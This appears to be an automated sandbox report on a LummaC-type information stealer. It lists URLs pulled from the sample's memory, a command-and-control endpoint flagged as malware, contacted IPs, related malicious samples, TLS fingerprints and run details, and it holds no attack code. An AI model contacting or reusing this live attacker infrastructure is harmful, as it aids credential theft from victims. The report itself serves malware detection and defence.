                                                                                                                              https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&amp;k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://help.steampowered.com/en/k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://steamcommunity.com/market/k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://store.steampowered.com/news/k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=k7T6akLcAr.exe, 00000000.00000003.2237358352.00000000055CC000.00000004.00000800.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2237434433.00000000055CC000.00000004.00000800.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2237220194.00000000055CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        http://store.steampowered.com/subscriber_agreement/k7T6akLcAr.exe, 00000000.00000003.2214068044.0000000000A0D000.00000004.00000020.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgk7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpgk7T6akLcAr.exe, 00000000.00000003.2307744830.0000000005592000.00000004.00000800.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2308093192.0000000005596000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://steamcommunity.com/discussions/k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://store.steampowered.com/stats/k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&amk7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngk7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&amp;l=english&ak7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        https://store.steampowered.com/steam_refunds/k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          http://x1.c.lencr.org/0k7T6akLcAr.exe, 00000000.00000003.2284289746.00000000055AD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            http://x1.i.lencr.org/0k7T6akLcAr.exe, 00000000.00000003.2284289746.00000000055AD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchk7T6akLcAr.exe, 00000000.00000003.2237358352.00000000055CC000.00000004.00000800.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2237434433.00000000055CC000.00000004.00000800.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2237220194.00000000055CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&ak7T6akLcAr.exe, 00000000.00000003.2214068044.0000000000A0D000.00000004.00000020.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&amp;l=ek7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        https://steamcommunity.com/workshop/k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          https://support.mozilla.org/products/firefoxgro.allk7T6akLcAr.exe, 00000000.00000003.2285086260.000000000569F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&amp;l=english&amp;_ck7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              https://store.steampowered.com/legal/k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                https://www.mozilla.ork7T6akLcAr.exe, 00000000.00000003.2307679456.00000000055A9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&amp;l=enk7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&amp;l=engk7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      https://lev-tolstoi.com/api?k7T6akLcAr.exe, 00000000.00000003.2388617851.0000000000A9C000.00000004.00000020.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000002.2392347427.0000000000A9C000.00000004.00000020.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2355357038.0000000000A9C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      • Avira URL Cloud: malware
                                                                                                                                                                                      		unknown
                                                                                                                                                                                      https://www.google.com/images/branding/product/ico/googleg_lodp.icok7T6akLcAr.exe, 00000000.00000003.2237358352.00000000055CC000.00000004.00000800.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2237434433.00000000055CC000.00000004.00000800.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2237220194.00000000055CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.k7T6akLcAr.exe, 00000000.00000003.2307744830.0000000005592000.00000004.00000800.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2308093192.0000000005596000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&amp;l=english&ak7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&amp;l=englk7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              https://store.steampowered.com/k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=oOCAGrkRfpQ6&amp;l=ek7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  https://lev-tolstoi.com/api9k7T6akLcAr.exe, 00000000.00000003.2214068044.0000000000A4D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  • Avira URL Cloud: malware
                                                                                                                                                                                                  		unknown
                                                                                                                                                                                                  https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.pngk7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpgk7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_k7T6akLcAr.exe, 00000000.00000003.2307744830.0000000005592000.00000004.00000800.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2308093192.0000000005596000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        		high
                                                                                                                                                                                                        https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gifk7T6akLcAr.exe, 00000000.00000003.2214068044.0000000000A0D000.00000004.00000020.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          		high
                                                                                                                                                                                                          https://lev-tolstoi.com/api3k7T6akLcAr.exe, 00000000.00000003.2283743192.000000000558A000.00000004.00000800.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2283837927.0000000005596000.00000004.00000800.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2284043332.0000000005592000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          https://ac.ecosia.org/autocomplete?q=k7T6akLcAr.exe, 00000000.00000003.2237358352.00000000055CC000.00000004.00000800.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2237434433.00000000055CC000.00000004.00000800.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2237220194.00000000055CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            		high
                                                                                                                                                                                                            https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgk7T6akLcAr.exe, 00000000.00000003.2307744830.0000000005592000.00000004.00000800.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2308093192.0000000005596000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              		high
                                                                                                                                                                                                              https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQk7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                		high
                                                                                                                                                                                                                https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3k7T6akLcAr.exe, 00000000.00000003.2307744830.0000000005592000.00000004.00000800.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2308093192.0000000005596000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  		high
                                                                                                                                                                                                                  http://crt.rootca1.amazontrust.com/rootca1.cer0?k7T6akLcAr.exe, 00000000.00000003.2284289746.00000000055AD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    		high
                                                                                                                                                                                                                    https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&ampk7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      		high
                                                                                                                                                                                                                      http://store.steampowered.com/account/cookiepreferences/k7T6akLcAr.exe, 00000000.00000003.2214068044.0000000000A0D000.00000004.00000020.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        		high
                                                                                                                                                                                                                        https://store.steampowered.com/mobilek7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          		high
                                                                                                                                                                                                                          https://steamcommunity.com/k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            		high
                                                                                                                                                                                                                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=k7T6akLcAr.exe, 00000000.00000003.2237358352.00000000055CC000.00000004.00000800.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2237434433.00000000055CC000.00000004.00000800.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2237220194.00000000055CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              		high

                                                                                                                                                                                                                              World Map of Contacted IPs

                                                                                                                                                                                                                              • No. of IPs < 25%
                                                                                                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                                                                                                              • 75% < No. of IPs

                                                                                                                                                                                                                              Public IPs

                                                                                                                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                              172.67.157.254
                                                                                                                                                                                                                              		lev-tolstoi.comUnited States
                                                                                                                                                                                                                              		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                              23.55.153.106
                                                                                                                                                                                                                              		steamcommunity.comUnited States
                                                                                                                                                                                                                              		20940AKAMAI-ASN1EUfalse

                                                                                                                                                                                                                              General Information

                                                                                                                                                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                              Analysis ID:1581595
                                                                                                                                                                                                                              Start date and time:2024-12-28 09:39:42 +01:00
                                                                                                                                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                              Overall analysis duration:0h 6m 17s
                                                                                                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                              Report type:full
                                                                                                                                                                                                                              Cookbook file name:default.jbs
                                                                                                                                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                              Number of analysed new started processes analysed:4
                                                                                                                                                                                                                              Number of new started drivers analysed:0
                                                                                                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                                                                                                              Number of injected processes analysed:0
                                                                                                                                                                                                                              Technologies:
                                                                                                                                                                                                                              • HCA enabled
                                                                                                                                                                                                                              • EGA enabled
                                                                                                                                                                                                                              • AMSI enabled
                                                                                                                                                                                                                              Analysis Mode:default
                                                                                                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                                                                                                              Sample name:k7T6akLcAr.exe
                                                                                                                                                                                                                              renamed because original name is a hash value
                                                                                                                                                                                                                              Original Sample Name:fccb91d8f4ef18da22c21583c82c56c0.exe
                                                                                                                                                                                                                              Detection:MAL
                                                                                                                                                                                                                              Classification:mal100.troj.spyw.evad.winEXE@1/0@11/2
                                                                                                                                                                                                                              EGA Information:Failed
                                                                                                                                                                                                                              HCA Information:
                                                                                                                                                                                                                              • Successful, ratio: 100%
                                                                                                                                                                                                                              • Number of executed functions: 0
                                                                                                                                                                                                                              • Number of non-executed functions: 3
                                                                                                                                                                                                                              Cookbook Comments:
                                                                                                                                                                                                                              • Found application associated with file extension: .exe

                                                                                                                                                                                                                              Warnings

                                                                                                                                                                                                                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                                                                                                                                                              • Excluded IPs from analysis (whitelisted): 13.107.246.63, 4.245.163.56, 172.202.163.200
                                                                                                                                                                                                                              • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                                              • Execution Graph export aborted for target k7T6akLcAr.exe, PID 6032 because there are no executed function
                                                                                                                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                                                                                                                              Simulations

                                                                                                                                                                                                                              Behavior and APIs

                                                                                                                                                                                                                              TimeTypeDescription
                                                                                                                                                                                                                              03:40:36API Interceptor18x Sleep call for process: k7T6akLcAr.exe modified

                                                                                                                                                                                                                              Joe Sandbox View / Context

                                                                                                                                                                                                                              IPs

                                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                              172.67.157.254hx0wBsOjkQ.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                fnnGMmd8eJ.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                  IzDjbVdHha.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    T4qO1i2Jav.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                      k0ukcEH.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        pVbAZEFIpI.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                          MaZjv5XeQi.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            jT7sgjdTea.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                              Y4svWfRK1L.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                YKri2nEBWE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  23.55.153.106SPzPNCzcCy.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    hx0wBsOjkQ.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      MrIOYC1Pns.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                        fnnGMmd8eJ.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                          PW6pjyv02h.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                            Solara-v3.0.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              Script.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                Neverlose.cc-unpadded.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                  Aura.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                    Aura.exeGet hashmaliciousLummaCBrowse

                                                                                                                                                                                                                                                                      Domains

                                                                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                      lev-tolstoi.comSPzPNCzcCy.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                      • 104.21.66.86
                                                                                                                                                                                                                                                                      hx0wBsOjkQ.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                      • 172.67.157.254
                                                                                                                                                                                                                                                                      fnnGMmd8eJ.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                      • 172.67.157.254
                                                                                                                                                                                                                                                                      Solara-v3.0.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                      • 104.21.66.86
                                                                                                                                                                                                                                                                      Script.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                      • 104.21.66.86
                                                                                                                                                                                                                                                                      Aura.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                      • 104.21.66.86
                                                                                                                                                                                                                                                                      Installer.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                      • 104.21.66.86
                                                                                                                                                                                                                                                                      SoftWare(1).exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                      • 104.21.66.86
                                                                                                                                                                                                                                                                      ForcesLangi.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                      • 104.21.66.86
                                                                                                                                                                                                                                                                      Leside-.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                      • 104.21.66.86
                                                                                                                                                                                                                                                                      steamcommunity.comSPzPNCzcCy.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                                      hx0wBsOjkQ.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                                      MrIOYC1Pns.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                                      fnnGMmd8eJ.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                                      PW6pjyv02h.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                                      Solara-v3.0.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                                      Script.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                                      Neverlose.cc-unpadded.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                                      Aura.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                                      Aura.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                      • 23.55.153.106

                                                                                                                                                                                                                                                                      ASNs

                                                                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                      AKAMAI-ASN1EUSPzPNCzcCy.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                                      hx0wBsOjkQ.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                                      MrIOYC1Pns.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                                      fnnGMmd8eJ.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                                      PW6pjyv02h.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                                      Solara-v3.0.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                                      Script.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                                      Neverlose.cc-unpadded.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                                      Aura.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                                      Aura.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                                      CLOUDFLARENETUSSPzPNCzcCy.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                      • 104.21.66.86
                                                                                                                                                                                                                                                                      es5qBEFupj.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                      • 172.67.128.184
                                                                                                                                                                                                                                                                      vUcZzNWkKc.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                      • 172.67.128.184
                                                                                                                                                                                                                                                                      CLaYpUL3zw.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                      • 172.67.128.184
                                                                                                                                                                                                                                                                      hx0wBsOjkQ.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                      • 172.67.157.254
                                                                                                                                                                                                                                                                      fnnGMmd8eJ.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                      • 172.67.157.254
                                                                                                                                                                                                                                                                      lumma.ps1Get hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                      • 172.67.167.249
                                                                                                                                                                                                                                                                      BagsThroat.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                                      • 104.21.80.1
                                                                                                                                                                                                                                                                      ronwod.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                      • 104.21.92.219
                                                                                                                                                                                                                                                                      ronwod.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                      • 172.67.198.222

                                                                                                                                                                                                                                                                      JA3 Fingerprints

                                                                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                      a0e9f5d64349fb13191bc781f81f42e1SPzPNCzcCy.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                      • 172.67.157.254
                                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                                      es5qBEFupj.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                      • 172.67.157.254
                                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                                      vUcZzNWkKc.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                      • 172.67.157.254
                                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                                      CLaYpUL3zw.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                      • 172.67.157.254
                                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                                      hx0wBsOjkQ.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                      • 172.67.157.254
                                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                                      MrIOYC1Pns.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                      • 172.67.157.254
                                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                                      fnnGMmd8eJ.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                      • 172.67.157.254
                                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                                      PW6pjyv02h.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                      • 172.67.157.254
                                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                                      lumma.ps1Get hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                      • 172.67.157.254
                                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                                      BagsThroat.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                                      • 172.67.157.254
                                                                                                                                                                                                                                                                      • 23.55.153.106

                                                                                                                                                                                                                                                                      Dropped Files

                                                                                                                                                                                                                                                                      No context

                                                                                                                                                                                                                                                                      Created / dropped Files

                                                                                                                                                                                                                                                                      No created / dropped files found

                                                                                                                                                                                                                                                                      Static File Info

                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                      Entropy (8bit):6.530740868343317
                                                                                                                                                                                                                                                                      TrID:
                                                                                                                                                                                                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                                      File name:k7T6akLcAr.exe
